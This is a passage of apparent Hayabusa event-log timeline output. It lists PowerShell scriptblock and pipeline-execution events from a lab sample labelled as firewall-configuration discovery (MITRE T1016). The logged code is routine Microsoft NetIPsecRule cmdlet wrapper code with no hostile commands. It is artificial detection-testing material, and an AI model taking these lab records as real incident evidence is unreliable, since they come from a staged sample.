[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parame",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBo",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"undParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] 